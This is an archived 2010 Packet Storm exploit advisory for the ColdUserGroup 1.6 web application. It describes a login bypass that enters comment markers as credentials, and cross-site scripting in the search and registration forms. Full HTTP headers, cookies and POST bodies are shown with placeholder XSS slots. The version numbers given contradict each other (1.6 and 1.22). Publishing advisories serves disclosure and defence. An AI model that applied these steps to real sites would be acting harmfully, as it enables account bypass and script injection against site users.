ColdUserGroup 1.6 Bypass / Cross Site Scripting

2010-09-11T00:00:00
ID PACKETSTORM:93731
Type packetstorm
Reporter Sangteamtham
Modified 2010-09-11T00:00:00

Description

                                        
                                            `#**********************************************************  
# Exploit Title: ColdUserGroup - Version 1.6 bypass/XSS Vulnerabilities  
# Date: 09/09/2010  
# Author: Sangteamtham  
# Software Link: http://www.coldgen.com/index.cfm?ColdGen=ProductDetails&ProductID=8  
# Version: 1.22  
# Tested on: Windows 7  
#  
#***********************************************************  
  
1.Description:  
Built using Fusebox and adhering to CSS/XHTML standards the ColdUserGroup application is intended to allow a quickstart to hosting your own user group web site. Currently in live use at www.actcfug.com. Some of the features in use on the live site have been removed but can be easily integrated (ie: Google Calendar). This new version now utilises FCKEditor as the rich text editor, rather than the original ActivEdit  
  
2. Exploit  
  
2.a: bypass login  
  
http://site.com/index.cfm?actcfug=MemberLoginForm  
  
User Name:<!--  
Password :<!--  
  
2.b: XSS vul:  
  
In Search Form and register form, the vendor does not filter the special characters.So attackers will put the malicious code into that form.   
  
3. Poc:  
  
Victim: http://victim.com/index.cfm  
  
  
3.a. Login form:  
  
I found it work just in opera Version 10.61 only  
  
3.b. Forgotten form:  
  
3.b.1:  
  
http://site.com/index.cfm?fuseaction=LookupPassword  
  
+Header:  
  
Host: www.site.com  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
Referer: http://www.actcfug.com/index.cfm?actcfug=SearchSite  
Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109  
  
  
+ Post data:  
  
Content-type: application/x-www-form-urlencoded\r\n  
Content-length: 99\r\n  
\r\n  
SubmitForm=Search%20Site&Keywords=[XSS here]&Category=Articles  
  
3.b.2:  
  
Header:  
  
Host: www.actcfug.com  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
Referer: http://www.actcfug.com/index.cfm?actcfug=MemberJoin  
Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109  
  
Post data:  
Content-type: application/x-www-form-urlencoded\r\n  
Content-length: 419\r\n  
\r\n  
Join=%20%20%20Join%20the%20ACTCFUG%20%20%20&UserName=sangte&UserPassword=123456&ConfirmPassword=123456&UserFirstName=[XSS HERE]&UserLastName=amtham&UserEmailAddress=sangte%40ok%2Ecom&Newsletter=true&EmailAccount=false  
  
  
4. Patch:  
  
Vender should filter the special characters when input the form.  
  
5. Credits:  
Thanks flying to Vietnamese hackers and all hackers out there researching for more security.  
*************************************************************  
`